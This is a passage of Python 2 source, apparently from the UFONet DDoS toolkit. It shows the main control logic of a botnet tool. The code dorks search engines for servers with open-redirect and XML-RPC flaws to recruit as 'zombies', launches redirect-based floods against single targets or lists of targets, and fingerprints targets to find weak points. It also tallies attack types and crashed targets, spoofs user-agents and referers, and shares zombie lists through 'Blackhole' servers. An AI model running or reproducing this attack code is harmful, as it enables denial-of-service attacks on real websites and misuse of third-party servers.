 773. engines_list = self.search_engines
 774. stop_flag = False # use a flag to establish an end
 775. try:
 776. self.banner()
 777. print "\n[AI] Searching automatically for [Zombies] (WARNING: this may take several time!)\n"
 778. print "[Info] Try to use CTRL+z (on shell) to STOP IT! ;-)\n"
 779. print '-'*25 + "\n"
 780. zombies_found = []
 781. lz = open(self.zombies_file, 'r')
 782. zombies_army = lz.readlines()
 783. for zombie in zombies_army:
 784. zombies_found.append(zombie) # add zombies from army to the zombies found pool
 785. lz.close()
 786. if not os.path.exists(self.humans_file) == True:
 787. f = open(self.humans_file, 'w')
 788. f.close()
 789. lf = open(self.humans_file, 'r')
 790. restored = lf.readlines()
 791. zombies_restored = len(restored)
 792. lf.close()
 793. if len(restored) > 0:
 794. print "[Info] [AI] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n"
 795. if not self.options.forceyes:
 796. backup_reply = raw_input("[AI] Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n")
 797. print '-'*25
 798. else:
 799. backup_reply = "Y"
 800. if backup_reply == "n" or backup_reply == "N":
 801. print "\n[Info] [AI] Removing data stored and starting a new (auto)search...\n"
 802. os.remove(self.humans_file)
 803. zombies_restored = 0 # flush zombies restored
 804. print '-'*25 + "\n"
 805. else:
 806. print "\n[Info] [AI] Restoring data and starting a new (auto)search...\n"
 807. print '-'*25 + "\n"
 808. for zombie in restored:
 809. zombies_found.append(zombie) # add previous data to zombies found pool
 810. total_restored = zombies_restored
 811. while stop_flag == False:
 812. if not os.path.exists(self.humans_file) == True:
 813. f = open(self.humans_file, 'w')
 814. f.close()
 815. lf = open(self.humans_file, 'r') # read it on each iteration to update changes
 816. restored = lf.readlines()
 817. lf.close()
 818. zombies_restored = len(restored)
 819. for e in engines_list:
 820. zombies_counter = 0 # use it also as (engine) flag
 821. engine = e
 822. self.options.engine = engine
 823. print '='*44 + '\n'
 824. print("[AI] Searching for zombies using: "+engine+'\n')
 825. print '='*44 + '\n'
 826. for dork in dorks:
 827. print '='*22
 828. print "Dork:", dork
 829. print '='*22 + '\n'
 830. try:
 831. dorked_zombies = self.search_zombies(dork, zombies_found) # AI mode
 832. for zombie in dorked_zombies:
 833. if zombie not in zombies_found: # evade repetitions for zombies found
 834. zombies_found.append(zombie)
 835. if zombie+os.linesep not in restored: # only append new zombies found
 836. with open(self.humans_file, "a") as f:
 837. f.write(str(zombie+os.linesep))
 838. f.close()
 839. zombies_counter = zombies_counter + 1
 840. except:
 841. if zombies_found: # backup new zombies found on exception
 842. for zombie in zombies_found:
 843. if zombie+os.linesep not in restored: # only append new zombies found
 844. with open(self.humans_file, "a") as f:
 845. f.write(str(zombie+os.linesep))
 846. f.close()
 847. if zombies_counter == 0:
 848. print "[Info] [AI] NOT more NEW victims found (by the moment) using: "+engine+" -> [Discarding!]\n"
 849. print '-'*25 + "\n"
 850. engines_list.remove(engine) # remove not more results engine from search engines list
 851. if not engines_list: # if search engines empty, call return-exit routine
 852. print "[Info] [AI] Search engines aren't providing more results -> [Exiting!]\n"
 853. print '-'*25 + "\n"
 854. stop_flag = True # exit flag up
 855. new_zombies = 0 # new zombies counter
 856. f = open(self.zombies_file, 'r')
 857. zz = f.readlines()
 858. f.close()
 859. all_zombies_found = []
 860. for z in zombies_found:
 861. if z.endswith(os.linesep):
 862. z = z.replace(os.linesep, "")
 863. if z not in zz and z+os.linesep not in zz:
 864. new_zombies = new_zombies + 1
 865. all_zombies_found.append(z)
 866. print '='*62
 867. print "\n- Victims found:", len(all_zombies_found), "\n"
 868. print " - Restored:", total_restored
 869. print " - Dorked:", len(all_zombies_found) - total_restored, "\n"
 870. print '-'*32
 871. print "\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n"
 872. print '='*62 + '\n'
 873. if len(zombies_found) > 0:
 874. if not self.options.forceyes:
 875. check_backup_reply = raw_input("[AI] Do you want to save the results for a future search? (Y/n)\n")
 876. print '-'*25
 877. else:
 878. check_backup_reply = "Y"
 879. if check_backup_reply == "n" or check_backup_reply == "N":
 880. if os.path.isfile(self.humans_file):
 881. os.remove(self.humans_file) # remove search backup file (keeping love from shadows!)
 882. print "\n[Info] [AI] Temporal data correctly removed...\n"
 883. else:
 884. with open(self.humans_file, "w") as f:
 885. for z in all_zombies_found:
 886. if z.endswith(os.linesep):
 887. z = z.replace(os.linesep, "")
 888. if z not in zz or z+os.linesep not in zz:
 889. f.write(z+os.linesep)
 890. f.close()
 891. print "\n[Info] [AI] Correctly saved at: 'botnet/humans.txt'\n"
 892. print '-'*25 + "\n"
 893. if new_zombies and new_zombies > 0:
 894. if not self.options.forceyes:
 895. check_url_link_reply = raw_input("[AI] Do you want to check if NEW possible zombies are valid? (Y/n)\n")
 896. print '-'*25 + "\n"
 897. else:
 898. check_url_link_reply = "Y"
 899. if check_url_link_reply == "n" or check_url_link_reply == "N":
 900. print "[AI] "+self.exit_msg+"\n"
 901. pass
 902. else:
 903. print "\n" + '='*44
 904. test = self.testing(all_zombies_found)
 905. else:
 906. print "[Info] [AI] NOT any NEW possible zombies found! -> [Exiting!]\n"
 907. except Exception:
 908. print ("[Error] [AI] Something wrong (auto)searching...\n")
 909. # test web 'zombie' servers -> show statistics
 910. if options.test:
 911. try:
 912. self.banner()
 913. zombies = self.extract_zombies()
 914. if not zombies:
 915. return
 916. test = self.testing(zombies)
 917. self.update_missions_stats() # update mothership missions stats
 918. except Exception:
 919. print ("\n[Error] [AI] Something wrong testing!\n")
 920. if self.options.verbose:
 921. traceback.print_exc()
 922. # test XML-'rpc' pingback vulnerable servers -> update list
 923. if options.testrpc:
 924. try:
 925. self.banner()
 926. rpcs = self.extract_rpcs()
 927. if not rpcs:
 928. return
 929. testrpc = self.testing_rpcs(rpcs)
 930. self.update_missions_stats() # update mothership missions stats
 931. except Exception:
 932. print ("\n[Error] [AI] Something wrong testing X-RPCs!\n")
 933. if self.options.verbose:
 934. traceback.print_exc()
 935. # check botnet searching for zombies offline
 936. if options.testoffline:
 937. try:
 938. self.banner()
 939. testbotnet = self.testing_offline()
 940. self.update_missions_stats() # update mothership missions stats
 941. except Exception:
 942. print ("\n[Error] [AI] Something wrong checking for offline [Zombies]!\n")
 943. if self.options.verbose:
 944. traceback.print_exc()
 945. # check ALL botnet status
 946. if options.testall:
 947. try:
 948. self.banner()
 949. test_all_botnet = self.testing_all()
 950. self.update_missions_stats() # update mothership missions stats
 951. except Exception:
 952. print ("\n[Error] [AI] Something wrong testing ALL botnet status!\n")
 953. if self.options.verbose:
 954. traceback.print_exc()
 955. # attack target -> exploit Open Redirect massively and conduct vulnerable servers to a single target
 956. if options.target:
 957. try:
 958. self.banner()
 959. zombies = self.extract_zombies()
 960. if not zombies:
 961. return
 962. attack = self.attacking(zombies, options.target)
 963. self.update_missions_stats() # update mothership missions stats
 964. except Exception:
 965. print ("\n[Error] [AI] Something wrong attacking!\n")
 966. if self.options.verbose:
 967. traceback.print_exc()
 968. # attack a list of targets -> exploit Open Redirect massively and conduct vulnerable servers to multiple targets
 969. if options.target_list:
 970. try:
 971. self.banner()
 972. zombies = self.extract_zombies()
 973. if not zombies:
 974. return
 975. targets = self.extract_target_list()
 976. if not targets:
 977. print "\n[Error] [AI] You haven't any valid [Target] to be extracted from: "+str(options.target_list)+" -> [Exiting!]\n"
 978. return
 979. self.options.forceyes = True # force-yes ON!
 980. self.num_target_list = 0
 981. print "\n[AI] Checking integrity of targets...\n"
 982. for t in targets: # start of code block dedicated to: Guido van Rossum [23/12/2018]
 983. if not t.startswith("http"): # discarded inmediately
 984. print "[Info] [AI] [Control] " + str(t) + " -> [Discarding!]"
 985. targets.remove(t) # ¿remove? invalid targets
 986. print ""
 987. c = 0
 988. for target in targets:
 989. if target == "":
 990. c = c + 1
 991. else:
 992. self.num_target_list = self.num_target_list + 1
 993. if c == len(targets):
 994. print "\n[Error] [AI] You haven't any valid [Target] to be extracted from: "+str(options.target_list)+" -> [Exiting!]\n"
 995. return # end of code block dedicated to: Guido van Rossum [23/12/2018]
 996. else:
 997. for target in targets:
 998. print '='*55 + "\n"
 999. print "[Info] [AI] Aiming: " + str(target) + " -> [OK!]\n"
 1000. print "="*55
 1001. self.options.target = target
 1002. attack = self.attacking(zombies, target)
 1003. self.update_missions_stats() # update mothership missions stats (each target counts)
 1004. except Exception:
 1005. print ("\n[Error] [AI] Something wrong attacking to multiple targets!\n")
 1006. if self.options.verbose:
 1007. traceback.print_exc()
 1008. # inspect target -> inspect target's components sizes
 1009. if options.inspect:
 1010. try:
 1011. self.banner()
 1012. print("\n[AI] Inspecting target to find the best place to attack... SSssh!\n")
 1013. print '='*22 + '\n'
 1014. self.instance = Inspector(self) # instance main class for inspection operations
 1015. inspection = self.instance.inspecting(options.inspect)
 1016. self.update_missions_stats() # update mothership missions stats
 1017. except Exception, e:
 1018. print ("\n[Error] [AI] Something wrong inspecting... Not any object found!\n")
 1019. if self.options.verbose:
 1020. traceback.print_exc()
 1021. return #sys.exit(2)
 1022. # abduct target -> examine target's webserver configuration (banner grabbing, anti-ddos, etc.)
 1023. if options.abduction:
 1024. try:
 1025. self.banner()
 1026. print("\n[AI] Abducting target to extract interesting information... Be patient!\n")
 1027. print '='*22 + '\n'
 1028. self.instance = Abductor(self) # instance main class for abduction operations
 1029. abduction = self.instance.abducting(options.abduction)
 1030. self.update_missions_stats() # update mothership missions stats
 1031. except Exception, e:
 1032. print ("\n[Error] [AI] Something wrong abducting... Not any data stream found!\n")
 1033. if self.options.verbose:
 1034. traceback.print_exc()
 1035. return #sys.exit(2)
 1036. # attack me -> exploit Open Redirect massively and connect all vulnerable servers to master for benchmarking
 1037. if options.attackme:
 1038. self.mothership_id = self.mothership_id[:25] # truncating anti-formats ;-)
 1039. try:
 1040. self.banner()
 1041. print("\n[AI] Ordering [Zombies] to attack you for benchmarking ;-)\n")
 1042. print("[Warning] You are going to reveal your real IP to [Zombies]!\n")
 1043. if not self.options.forceyes:
 1044. update_reply = raw_input("[AI] Do you want to continue? (Y/n)")
 1045. else:
 1046. update_reply = "Y"
 1047. if update_reply == "n" or update_reply == "N":
 1048. print "\n[Info] [AI] [Control] Aborting 'Attack-Me' test... -> [Exiting!]\n"
 1049. return
 1050. self.mothership_hash = str(random.getrandbits(128)) # generating random evasion hash
 1051. print "\nMothership ID: " + self.mothership_id + "RND: " + self.mothership_hash
 1052. print("\n[AI] Checking NAT/IP configuration:\n")
 1053. nat = self.check_nat()
 1054. f = open("alien", "w") # generate random alien worker
 1055. f.write(str(self.mothership_hash))
 1056. f.close()
 1057. if self.nat_error_flag == "ON":
 1058. return
 1059. zombies = self.extract_zombies()
 1060. if not zombies:
 1061. return
 1062. attackme = self.attackme(zombies)
 1063. self.update_missions_stats() # update mothership missions stats
 1064. except Exception, e:
 1065. print ("\n[Error] [AI] Something wrong redirecting [Zombies] against you...\n")
 1066. if self.options.verbose:
 1067. traceback.print_exc()
 1068. return #sys.exit(2)
 1069. # check/update for latest stable version
 1070. if options.update:
 1071. self.banner()
 1072. try:
 1073. print("\n[AI] Trying to update automatically to the latest stable version\n")
 1074. Updater()
 1075. except:
 1076. print "Not any .git repository found!\n"
 1077. print "="*30
 1078. print "\nTo have working this feature, you should clone UFONet with:\n"
 1079. print "$ git clone %s" % self.GIT_REPOSITORY
 1080. print "\nAlso you can try this other mirror:\n"
 1081. print "$ git clone %s" % self.GIT_REPOSITORY2 + "\n"
 1082. # launch GUI/Web interface
 1083. if options.web:
 1084. self.create_web_interface()
 1085. return
 1086. # generate [Blackhole] server to share [Zombies]
 1087. if options.blackhole is not None:
 1088. self.banner()
 1089. try:
 1090. blackhole_lib = os.path.abspath(os.path.join('..', 'server')) # add [Blackhole] lib
 1091. sys.path.append(blackhole_lib)
 1092. from server.blackhole import BlackHole
 1093. print("\n[AI] Initiating void generation sequence...\n")
 1094. print '='*22 + '\n'
 1095. app = BlackHole()
 1096. app.start()
 1097. while True: time.sleep(1)
 1098. except KeyboardInterrupt:
 1099. print("\n[AI] Terminating void generation sequence...\n")
 1100. app.collapse()
 1101. except Exception, e:
 1102. print "[Error] "+str(e)
 1103. print("\n[AI] Something was wrong generating [Blackhole]. Aborting...\n")
 1104. # download list of [Zombies] from a [Blackhole] IP
 1105. if options.dip is not None:
 1106. options.download = True
 1107. self.blackhole = options.dip
 1108. # download list of [Zombies] from server
 1109. if options.download:
 1110. try:
 1111. self.banner()
 1112. if options.dip is not None:
 1113. print("\n[AI] Downloading list of [Zombies] from server "+self.blackhole+" ...\n")
 1114. else:
 1115. print("\n[AI] Downloading list of [Zombies] from server ...\n")
 1116. print '='*22 + '\n'
 1117. download_list = self.downloading_list()
 1118. except Exception, e:
 1119. print ("\n[Error] [AI] Something wrong downloading! -> [Exiting!]\n")
 1120. return
 1121. # upload list of [Zombies] to a [Blackhole] IP
 1122. if options.upip is not None:
 1123. options.upload = True
 1124. self.blackhole = options.upip
 1125. # upload list of [Zombies] to server
 1126. if options.upload:
 1127. try:
 1128. self.banner()
 1129. if options.upip is not None:
 1130. print("\n[AI] Uploading list of [Zombies] to server "+self.blackhole+" ...\n")
 1131. else:
 1132. print("\n[AI] Uploading list of [Zombies] to server ...\n")
 1133. print '='*22 + '\n'
 1134. upload_list = self.uploading_list()
 1135. except Exception, e:
 1136. print ("[Error] [AI] Something wrong uploading! "+str(e)+" -> [Exiting!]\n")
 1137. if self.options.verbose:
 1138. traceback.print_exc()
 1139. return #sys.exit(2)
 1140. # starting new zombie thread
 1141. def connect_zombies(self, zombie):
 1142. z=Zombie(self, zombie)
 1143. t = threading.Thread(target=z.connect, name=zombie)
 1144. t.start()
 1145. # single connection handling
 1146. def connect_zombie(self, zombie):
 1147. z=Zombie(self,zombie)
 1148. return z.connect()
 1149. def extract_proxy(self, proxy):
 1150. sep = ":"
 1151. proxy_ip = proxy.rsplit(sep, 1)[0]
 1152. if proxy_ip.startswith('http://'):
 1153. proxy_ip = proxy_ip.replace('http://', '')
 1154. elif proxy_ip.startswith('https://'):
 1155. proxy_ip = proxy_ip.replace('https://', '')
 1156. if proxy_ip == '127.0.0.1': # working by using 'localhost' as http proxy (privoxy, ...)
 1157. proxy_ip = 'localhost'
 1158. proxy_port = proxy.rsplit(sep, 1)[1]
 1159. proxy_url = proxy_ip + ":" + proxy_port # ex: localhost:8118
 1160. return proxy_url
 1161. def proxy_transport(self, proxy):
 1162. proxy_url = self.extract_proxy(proxy)
 1163. proxy = urllib2.ProxyHandler({'https': proxy_url})
 1164. opener = urllib2.build_opener(proxy)
 1165. urllib2.install_opener(opener)
 1166. def check_mothership_chargo(self):
 1167. f = open(self.zombies_file)
 1168. self.zombies = f.readlines()
 1169. self.zombies = [zombie.replace('\n', '') for zombie in self.zombies]
 1170. self.list_zombies = []
 1171. for zombie in self.zombies:
 1172. t = urlparse(zombie)
 1173. name_zombie = t.netloc
 1174. if name_zombie == "":
 1175. name_zombie = zombie
 1176. self.list_zombies.append(name_zombie)
 1177. self.num_zombies = str(len(self.zombies))
 1178. f.close()
 1179. f = open(self.aliens_file)
 1180. self.aliens = f.readlines()
 1181. self.aliens = [alien.replace('\n', '') for alien in self.aliens]
 1182. self.list_aliens = []
 1183. for alien in self.aliens:
 1184. t = urlparse(alien)
 1185. name_alien = t.netloc
 1186. if name_alien == "":
 1187. name_alien = alien
 1188. self.list_aliens.append(name_alien)
 1189. self.num_aliens = str(len(self.aliens))
 1190. f.close()
 1191. f = open(self.droids_file)
 1192. self.droids = f.readlines()
 1193. self.droids = [droid.replace('\n', '') for droid in self.droids]
 1194. self.list_droids = []
 1195. for droid in self.droids:
 1196. t = urlparse(droid)
 1197. name_droid = t.netloc
 1198. if name_droid == "":
 1199. name_droid = droid
 1200. self.list_droids.append(name_droid)
 1201. self.num_droids = str(len(self.droids))
 1202. f.close()
 1203. f = open(self.ucavs_file)
 1204. self.ucavs = f.readlines()
 1205. self.ucavs = [ucav.replace('\n', '') for ucav in self.ucavs]
 1206. self.list_ucavs = []
 1207. for ucav in self.ucavs:
 1208. t = urlparse(ucav)
 1209. name_ucav = t.netloc
 1210. if name_ucav == "":
 1211. name_ucav = ucav
 1212. self.list_ucavs.append(name_ucav)
 1213. self.num_ucavs = str(len(self.ucavs))
 1214. f.close()
 1215. f = open(self.rpcs_file)
 1216. self.rpcs = f.readlines()
 1217. self.rpcs = [rpc.replace('\n', '') for rpc in self.rpcs]
 1218. self.list_rpcs = []
 1219. for rpc in self.rpcs:
 1220. t = urlparse(rpc)
 1221. name_rpc = t.netloc
 1222. if name_rpc == "":
 1223. name_rpc = rpc
 1224. self.list_rpcs.append(name_rpc)
 1225. self.num_rpcs = str(len(self.rpcs))
 1226. f.close()
 1227. self.total_botnet = str(int(self.num_zombies) + int(self.num_aliens) + int(self.num_droids) + int(self.num_ucavs) + int(self.num_rpcs))
 1228. return self.total_botnet
 1229. def update_flying_stats(self):
 1230. if not os.path.exists(self.mothership_stats_file) == True: # create data when no stats file (first time used)
 1231. with open(self.mothership_stats_file, "w") as f:
 1232. json.dump({"flying": "0", "missions": "0", "scanner": "0", "transferred": "0", "max_chargo": "0", "completed": "0", "loic": "0", "loris": "0", "ufosyn": "0", "spray": "0", "smurf": "0", "xmas": "0", "nuke": "0", "tachyon": "0", "crashed": "0"}, f, indent=4) # starting reset
 1233. stats_json_file = open(self.mothership_stats_file, "r")
 1234. data = json.load(stats_json_file)
 1235. stats_json_file.close()
 1236. aflying = data["flying"]
 1237. aflying = str(int(aflying) + 1) # add new flying time
 1238. data["flying"] = aflying
 1239. stats_json_file = open(self.mothership_stats_file, "w+")
 1240. stats_json_file.write(json.dumps(data))
 1241. stats_json_file.close()
 1242. def update_mothership_stats(self):
 1243. stats_json_file = open(self.mothership_stats_file, "r")
 1244. data = json.load(stats_json_file)
 1245. stats_json_file.close()
 1246. acompleted = data["completed"]
 1247. acompleted = str(int(acompleted) + 1) # add new completed attack
 1248. data["completed"] = acompleted
 1249. stats_json_file = open(self.mothership_stats_file, "w+")
 1250. stats_json_file.write(json.dumps(data))
 1251. stats_json_file.close()
 1252. def update_targets_crashed(self):
 1253. stats_json_file = open(self.mothership_stats_file, "r")
 1254. data = json.load(stats_json_file)
 1255. stats_json_file.close()
 1256. tcrashed = data["crashed"]
 1257. tcrashed = str(int(tcrashed) + 1) # add new crashed target
 1258. data["crashed"] = tcrashed
 1259. stats_json_file = open(self.mothership_stats_file, "w+")
 1260. stats_json_file.write(json.dumps(data))
 1261. stats_json_file.close()
 1262. def update_missions_stats(self):
 1263. stats_json_file = open(self.mothership_stats_file, "r")
 1264. data = json.load(stats_json_file)
 1265. stats_json_file.close()
 1266. missions = data["missions"]
 1267. missions = str(int(missions) + 1) # add new mission target
 1268. data["missions"] = missions
 1269. stats_json_file = open(self.mothership_stats_file, "w+")
 1270. stats_json_file.write(json.dumps(data))
 1271. stats_json_file.close()
 1272. def update_scanner_stats(self, num):
 1273. stats_json_file = open(self.mothership_stats_file, "r")
 1274. data = json.load(stats_json_file)
 1275. stats_json_file.close()
 1276. scanner = data["scanner"]
 1277. scanner = str(int(scanner) + int(num)) # add new zombies found by dorking to mothership stats
 1278. data["scanner"] = scanner
 1279. stats_json_file = open(self.mothership_stats_file, "w+")
 1280. stats_json_file.write(json.dumps(data))
 1281. stats_json_file.close()
 1282. def update_transferred_stats(self, num):
 1283. stats_json_file = open(self.mothership_stats_file, "r")
 1284. data = json.load(stats_json_file)
 1285. stats_json_file.close()
 1286. transferred = data["transferred"]
 1287. transferred = str(int(transferred) + int(num)) # add new zombies found by downloading via blackholes to mothership stats
 1288. data["transferred"] = transferred
 1289. stats_json_file = open(self.mothership_stats_file, "w+")
 1290. stats_json_file.write(json.dumps(data))
 1291. stats_json_file.close()
 1292. def update_max_chargo(self, chargo):
 1293. stats_json_file = open(self.mothership_stats_file, "r")
 1294. data = json.load(stats_json_file)
 1295. stats_json_file.close()
 1296. amax_chargo = data["max_chargo"]
 1297. if int(chargo) > int(amax_chargo): # new max chargo found
 1298. amax_chargo = chargo # add new max chargo
 1299. else:
 1300. amax_chargo = data["max_chargo"]
 1301. data["max_chargo"] = amax_chargo
 1302. stats_json_file = open(self.mothership_stats_file, "w+")
 1303. stats_json_file.write(json.dumps(data))
 1304. stats_json_file.close()
 1305. def update_loic_stats(self):
 1306. stats_json_file = open(self.mothership_stats_file, "r")
 1307. data = json.load(stats_json_file)
 1308. stats_json_file.close()
 1309. aloic = data["loic"]
 1310. aloic = str(int(aloic) + 1) # add new loic attack to recorded stats
 1311. self.total_loic = self.total_loic + 1 # add new loic attack to session stats
 1312. data["loic"] = aloic
 1313. stats_json_file = open(self.mothership_stats_file, "w+")
 1314. stats_json_file.write(json.dumps(data))
 1315. stats_json_file.close()
 1316. def update_loris_stats(self):
 1317. stats_json_file = open(self.mothership_stats_file, "r")
 1318. data = json.load(stats_json_file)
 1319. stats_json_file.close()
 1320. aloris = data["loris"]
 1321. aloris = str(int(aloris) + 1) # add new loris attack to recorded stats
 1322. self.total_loris = self.total_loris + 1 # add new loris attack to session stats
 1323. data["loris"] = aloris
 1324. stats_json_file = open(self.mothership_stats_file, "w+")
 1325. stats_json_file.write(json.dumps(data))
 1326. stats_json_file.close()
 1327. def update_ufosyn_stats(self):
 1328. stats_json_file = open(self.mothership_stats_file, "r")
 1329. data = json.load(stats_json_file)
 1330. stats_json_file.close()
 1331. aufosyn = data["ufosyn"]
 1332. aufosyn = str(int(aufosyn) + 1) # add new ufosyn attack to recorded stats
 1333. self.total_syn = self.total_syn + 1 # add new ufosyn attack to session stats
 1334. data["ufosyn"] = aufosyn
 1335. stats_json_file = open(self.mothership_stats_file, "w+")
 1336. stats_json_file.write(json.dumps(data))
 1337. stats_json_file.close()
 1338. def update_spray_stats(self):
 1339. stats_json_file = open(self.mothership_stats_file, "r")
 1340. data = json.load(stats_json_file)
 1341. stats_json_file.close()
 1342. aspray = data["spray"]
 1343. aspray = str(int(aspray) + 1) # add new spray attack to recorded stats
 1344. self.total_spray = self.total_spray + 1 # add new spray attack to session stats
 1345. data["spray"] = aspray
 1346. stats_json_file = open(self.mothership_stats_file, "w+")
 1347. stats_json_file.write(json.dumps(data))
 1348. stats_json_file.close()
 1349. def update_smurf_stats(self):
 1350. stats_json_file = open(self.mothership_stats_file, "r")
 1351. data = json.load(stats_json_file)
 1352. stats_json_file.close()
 1353. asmurf = data["smurf"]
 1354. asmurf = str(int(asmurf) + 1) # add new smurf attack to recorded stats
 1355. self.total_smurf = self.total_smurf + 1 # add new smurf attack to session stats
 1356. data["smurf"] = asmurf
 1357. stats_json_file = open(self.mothership_stats_file, "w+")
 1358. stats_json_file.write(json.dumps(data))
 1359. stats_json_file.close()
 1360. def update_xmas_stats(self):
 1361. stats_json_file = open(self.mothership_stats_file, "r")
 1362. data = json.load(stats_json_file)
 1363. stats_json_file.close()
 1364. axmas = data["xmas"]
 1365. axmas = str(int(axmas) + 1) # add new xmas attack to recorded stats
 1366. self.total_xmas = self.total_xmas + 1 # add new xmas attack to session stats
 1367. data["xmas"] = axmas
 1368. stats_json_file = open(self.mothership_stats_file, "w+")
 1369. stats_json_file.write(json.dumps(data))
 1370. stats_json_file.close()
 1371. def update_nuke_stats(self):
 1372. stats_json_file = open(self.mothership_stats_file, "r")
 1373. data = json.load(stats_json_file)
 1374. stats_json_file.close()
 1375. anuke = data["nuke"]
 1376. anuke = str(int(anuke) + 1) # add new nuke attack to recorded stats
 1377. self.total_nuke = self.total_nuke + 1 # add new nuke attack to session stats
 1378. data["nuke"] = anuke
 1379. stats_json_file = open(self.mothership_stats_file, "w+")
 1380. stats_json_file.write(json.dumps(data))
 1381. stats_json_file.close()
 1382. def update_tachyon_stats(self):
 1383. stats_json_file = open(self.mothership_stats_file, "r")
 1384. data = json.load(stats_json_file)
 1385. stats_json_file.close()
 1386. atachyon = data["tachyon"]
 1387. atachyon = str(int(atachyon) + 1) # add new tachyon attack to recorded stats
 1388. self.total_tachyon = self.total_tachyon + 1 # add new tachyon attack to session stats
 1389. data["tachyon"] = atachyon
 1390. stats_json_file = open(self.mothership_stats_file, "w+")
 1391. stats_json_file.write(json.dumps(data))
 1392. stats_json_file.close()
 1393. def uploading_list(self):
 1394. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 1395. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 1396. abductions = "abductions.txt.gz"
 1397. troops = "troops.txt.gz"
 1398. robots = "robots.txt.gz"
 1399. drones = "drones.txt.gz"
 1400. reflectors = "reflectors.txt.gz"
 1401. if self.options.timeout: # set timeout
 1402. try:
 1403. timeout = int(self.options.timeout)
 1404. except:
 1405. timeout = 1
 1406. else:
 1407. timeout = 1
 1408. if timeout < 1:
 1409. timeout = 1
 1410. try:
 1411. print("[AI] Checking integrity of [Blackhole]...\n")
 1412. if self.options.forcessl:
 1413. if self.options.proxy: # set proxy
 1414. self.proxy_transport(options.proxy)
 1415. req = urllib2.Request('https://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
 1416. abductions_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1417. req = urllib2.Request('https://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
 1418. troops_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1419. req = urllib2.Request('https://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
 1420. robots_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1421. req = urllib2.Request('https://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
 1422. drones_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1423. req = urllib2.Request('https://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
 1424. reflectors_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1425. else:
 1426. if self.options.proxy: # set proxy
 1427. self.proxy_transport(options.proxy)
 1428. req = urllib2.Request('http://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
 1429. abductions_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1430. req = urllib2.Request('http://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
 1431. troops_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1432. req = urllib2.Request('http://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
 1433. robots_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1434. req = urllib2.Request('http://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
 1435. drones_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1436. req = urllib2.Request('http://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
 1437. reflectors_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1438. print("[AI] [Control] [Blackhole] Reply: [VORTEX READY!] ;-)")
 1439. f_in_abductions = gzip.open(abductions_reply, 'rb')
 1440. f_out_abductions = open('abductions.txt', 'wb')
 1441. f_out_abductions.write(f_in_abductions.read())
 1442. f_in_abductions.close()
 1443. f_out_abductions.close()
 1444. os.remove(abductions) # remove .gz file
 1445. num_zombies = 0
 1446. with open('abductions.txt') as f:
 1447. for _ in f:
 1448. num_zombies = num_zombies + 1
 1449. print("\n[Info] [Zombies] on [Blackhole]: "+ str(num_zombies))
 1450. f_in_robots = gzip.open(robots_reply, 'rb')
 1451. f_out_robots = open('robots.txt', 'wb')
 1452. f_out_robots.write(f_in_robots.read())
 1453. f_in_robots.close()
 1454. f_out_robots.close()
 1455. os.remove(robots) # remove .gz file
 1456. num_robots = 0
 1457. with open('robots.txt') as f:
 1458. for _ in f:
 1459. num_robots = num_robots + 1
 1460. print("[Info] [Droids] on [Blackhole] : "+ str(num_robots))
 1461. f_in_troops = gzip.open(troops_reply, 'rb')
 1462. f_out_troops = open('troops.txt', 'wb')
 1463. f_out_troops.write(f_in_troops.read())
 1464. f_in_troops.close()
 1465. f_out_troops.close()
 1466. os.remove(troops) # remove .gz file
 1467. num_aliens = 0
 1468. with open(self.aliens_file) as f:
 1469. for _ in f:
 1470. num_aliens = num_aliens + 1
 1471. print("[Info] [Aliens] on [Blackhole] : "+ str(num_aliens))
 1472. f_in_drones = gzip.open(drones_reply, 'rb')
 1473. f_out_drones = open('drones.txt', 'wb')
 1474. f_out_drones.write(f_in_drones.read())
 1475. f_in_drones.close()
 1476. f_out_drones.close()
 1477. os.remove(drones) # remove .gz file
 1478. num_drones = 0
 1479. with open('drones.txt') as f:
 1480. for _ in f:
 1481. num_drones = num_drones + 1
 1482. print("[Info] [Drones] on [Blackhole] : "+ str(num_drones))
 1483. f_in_reflectors = gzip.open(reflectors_reply, 'rb')
 1484. f_out_reflectors = open('reflectors.txt', 'wb')
 1485. f_out_reflectors.write(f_in_reflectors.read())
 1486. f_in_reflectors.close()
 1487. f_out_reflectors.close()
 1488. os.remove(reflectors) # remove .gz file
 1489. num_reflectors = 0
 1490. with open('reflectors.txt') as f:
 1491. for _ in f:
 1492. num_reflectors = num_reflectors + 1
 1493. print("[Info] [X-RPCs] on [Blackhole] : "+ str(num_reflectors))
 1494. print '-'*12 + '\n'
 1495. if not self.options.forceyes:
 1496. update_reply = raw_input("[AI] Do you want to merge ONLY the new [Zombies] into [Blackhole]? (Y/n)")
 1497. print '-'*25
 1498. else:
 1499. update_reply = "Y"
 1500. if update_reply == "n" or update_reply == "N":
 1501. os.remove('abductions.txt') # remove abductions file
 1502. os.remove('troops.txt') # remove troops file
 1503. os.remove('robots.txt') # remove robots file
 1504. os.remove('drones.txt') # remove drones file
 1505. os.remove('reflectors.txt') # remove reflectors file
 1506. print "\n[Info] [AI] [Control] Aborting upload process and cleaning temporal files... -> [Exiting!]\n"
 1507. return
 1508. else:
